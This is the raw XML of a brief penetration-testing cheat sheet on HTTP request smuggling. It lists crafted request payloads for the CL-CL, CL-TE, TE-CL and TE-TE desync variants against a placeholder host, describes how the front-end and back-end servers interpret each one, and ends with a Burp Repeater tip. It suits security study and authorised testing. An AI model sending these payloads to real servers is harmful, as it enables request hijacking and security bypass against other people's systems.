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7BB5" w14:textId="0533F508" w:rsidR="0080726B" w:rsidRPr="00BA3297" w:rsidRDefault="0080726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3297">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>HTTP REQUEST SMUGGLING:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F8C34B" w14:textId="77777777" w:rsidR="0080726B" w:rsidRPr="00BA3297" w:rsidRDefault="0080726B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2338"/>
        <w:gridCol w:w="2338"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C973D9" w:rsidRPr="00BA3297" w14:paraId="2FAF26C9" w14:textId="77777777" w:rsidTr="00F2315C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="BDD6EE" w:themeFill="accent5" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="1B2B6795" w14:textId="3CFC7A1F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Type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B3174ED" w14:textId="5392C32E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Crafted Request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35F91F8" w14:textId="54E9B89B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Front End Proxy Server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46FCA42" w14:textId="48D2DC80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Back End Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C973D9" w:rsidRPr="00BA3297" w14:paraId="789DE771" w14:textId="77777777" w:rsidTr="00F2315C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D6FBA91" w14:textId="36E60029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CL! = 0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2614E73" w14:textId="77777777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GET / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F49E203" w14:textId="77777777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Host: target.com\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69723ED4" w14:textId="77777777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Content-Length: 44\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00358161" w14:textId="77777777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14:paraId="3BD773E4" w14:textId="77777777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GET /test HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E69C263" w14:textId="77777777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Host: target.com\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72554CCD" w14:textId="36C10299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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D7045B0" w14:textId="4029345F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Content-Length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checked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="672E5C75" w14:textId="0976BF57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Content-Length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NOT checked.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C973D9" w:rsidRPr="00BA3297" w14:paraId="43EA7A69" w14:textId="77777777" w:rsidTr="00F2315C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CC4CC51" w14:textId="6BEEB895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CL-CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="4C286E1A" w14:textId="57599C71" w:rsidR="00C973D9" w:rsidRPr="00BA3297" w:rsidRDefault="00C973D9" w:rsidP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POST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/ HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4614C565" w14:textId="77777777" w:rsidR="00C973D9" w:rsidRPr="00BA3297" w:rsidRDefault="00C973D9" w:rsidP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Host: target.com\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25E58763" w14:textId="3A188871" w:rsidR="00C973D9" w:rsidRPr="00BA3297" w:rsidRDefault="00C973D9" w:rsidP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Content-Length: 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>8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11C5F33A" w14:textId="2772906B" w:rsidR="00C973D9" w:rsidRPr="00BA3297" w:rsidRDefault="00C973D9" w:rsidP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Content-Length: 7\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="375EF0DD" w14:textId="77777777" w:rsidR="00C973D9" w:rsidRPr="00BA3297" w:rsidRDefault="00C973D9" w:rsidP="00C973D9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14:paraId="6ED91F16" w14:textId="7A3D7D2D" w:rsidR="00C973D9" w:rsidRPr="00BA3297" w:rsidRDefault="00C973D9" w:rsidP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12345\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04DF196B" w14:textId="1C46EC5B" w:rsidR="00C973D9" w:rsidRPr="00BA3297" w:rsidRDefault="00C973D9" w:rsidP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a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DDED71D" w14:textId="16D54315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Content-Length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is 8 here</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68EF6B0B" w14:textId="5EB9A2AE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Content-Length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is 7 here</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C973D9" w:rsidRPr="00BA3297" w14:paraId="396F16B1" w14:textId="77777777" w:rsidTr="00F2315C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1566D9D3" w14:textId="0C79856B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CL-TE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="14625845" w14:textId="77777777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POST / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BE0FE93" w14:textId="77777777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Host: target.com\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2AA0B8A0" w14:textId="31FD353E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Connection: keep-alive\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21930706" w14:textId="73513647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Content-Length: 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>6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20813ECF" w14:textId="2CB98385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Transfer-Encoding: chunked\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2424320B" w14:textId="7408C731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03256826" w14:textId="1B8F67C8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0\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DD98134" w14:textId="09B9BC92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25BF38AA" w14:textId="3A890FF7" w:rsidR="00C973D9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G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33ED9066" w14:textId="6A5496FB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Processed the </w:t>
            </w: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Content-Length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request header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3BC96D33" w14:textId="71E2ECFF" w:rsidR="00C973D9" w:rsidRPr="00BA3297" w:rsidRDefault="00C973D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Processed the </w:t>
            </w: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Transfer-Encoding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request header</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873483" w:rsidRPr="00BA3297" w14:paraId="52A944DF" w14:textId="77777777" w:rsidTr="00F2315C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="75C663FB" w14:textId="7FACCA61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TE-CL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="48A23BE4" w14:textId="77777777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POST / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12E0758B" w14:textId="77777777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Host: target.com\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76744F0E" w14:textId="4D501040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Content-Length</w:t>
            </w:r>
            <w:r w:rsidR="00F83944" w:rsidRPr="00BA3297">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>: 4\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13CB6196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Transfer-Encoding: chunked\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="586F8265" w14:textId="72D8F195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57BB0D74" w14:textId="405217C2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12\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38525FF4" w14:textId="4AFC7CA4" w:rsidR="00F83944" w:rsidRPr="00BA3297" w:rsidRDefault="00F83944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GPOST / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50B19287" w14:textId="77777777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2F7E974E" w14:textId="772F4447" w:rsidR="00F83944" w:rsidRPr="00BA3297" w:rsidRDefault="00F83944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0\r\n\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56F692A9" w14:textId="7A88D7D8" w:rsidR="00873483" w:rsidRPr="00BA3297" w:rsidRDefault="00F83944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</w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C654E9C" w14:textId="714DC89F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Processed the </w:t>
            </w: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Transfer-Encoding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request header</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6585A21E" w14:textId="4BA3AFE5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Processed the </w:t>
            </w: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Content-Length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request header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00873483" w:rsidRPr="00BA3297" w14:paraId="0F69B928" w14:textId="77777777" w:rsidTr="00F2315C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1129" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="42C3EF09" w14:textId="0B3C1AFF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TE-TE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3545" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="100ACC04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POST / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09417D2A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Host: target.com\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="306B6137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Content-Length: 4\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="227D5439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Transfer-Encoding: chunked\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D14CEFF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Transfer-Encoding: cow\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6255E0A1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13977215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5c\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="34005131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GPOST / HTTP/1.1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B379C2C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Content-Type: application/x-www-form-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00BA3297">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>urlencoded</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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6F6EEF84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Content-Length: 15\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DE78940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  <w:p w14:paraId="06891E1E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x=1\r\n</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55550B69" w14:textId="77777777" w:rsidR="00F83944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0\r\n\</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71B605CE" w14:textId="3AA3A2EC" w:rsidR="00873483" w:rsidRPr="00BA3297" w:rsidRDefault="00F83944" w:rsidP="00F8394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>\r\n</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F09B25C" w14:textId="204F2BAF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Accepts the </w:t>
            </w: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Transfer-Encoding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header. Obfuscation is used to not process the header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2338" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="620C5D72" w14:textId="444D4275" w:rsidR="00873483" w:rsidRPr="00BA3297" w:rsidRDefault="00873483" w:rsidP="008734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Accepts the </w:t>
            </w:r>
            <w:r w:rsidRPr="00BA3297">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
              </w:rPr>
              <w:t>Transfer-Encoding</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA3297">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> header. Obfuscation is used to not process the header.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2EDF094F" w14:textId="77777777" w:rsidR="00AB27E8" w:rsidRPr="00BA3297" w:rsidRDefault="00AB27E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F47CF39" w14:textId="77777777" w:rsidR="0030591F" w:rsidRDefault="0030591F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FF42A10" w14:textId="77777777" w:rsidR="0030591F" w:rsidRDefault="0030591F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="420E9D63" w14:textId="40E5838A" w:rsidR="0080726B" w:rsidRPr="00BA3297" w:rsidRDefault="0080726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3297">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">NOTE: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AF74C5B" w14:textId="77777777" w:rsidR="0080726B" w:rsidRPr="00BA3297" w:rsidRDefault="0080726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72F91E31" w14:textId="41EC9C20" w:rsidR="0080726B" w:rsidRPr="00BA3297" w:rsidRDefault="0080726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3297">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>CL = Content-Length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65820DB1" w14:textId="256EBFC2" w:rsidR="0080726B" w:rsidRPr="00BA3297" w:rsidRDefault="0080726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3297">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>TE = Transfer-Encoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A42989" w14:textId="77777777" w:rsidR="0080726B" w:rsidRPr="00BA3297" w:rsidRDefault="0080726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ACD8995" w14:textId="56494B4E" w:rsidR="0080726B" w:rsidRPr="00BA3297" w:rsidRDefault="0080726B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BA3297">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp: Remember to disable the automatic ‘Update Content-Length’ setting from the Repeater menu before manually testing for request smuggling. </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0080726B" w:rsidRPr="00BA3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D9"/>
    <w:rsid w:val="0030591F"/>
    <w:rsid w:val="003411D2"/>
    <w:rsid w:val="006262ED"/>
    <w:rsid w:val="0080726B"/>
    <w:rsid w:val="00873483"/>
    <w:rsid w:val="00904504"/>
    <w:rsid w:val="00AB27E8"/>
    <w:rsid w:val="00BA3297"/>
    <w:rsid w:val="00C973D9"/>
    <w:rsid w:val="00F2315C"/>
    <w:rsid w:val="00F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20AA2"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{EC8073D2-1AAC-FE46-BD46-53AC8B5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Gray</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Alastair Gray</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-11T14:04:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-05-11T14:27:00Z</dcterms:modified>
</cp:coreProperties>
</file>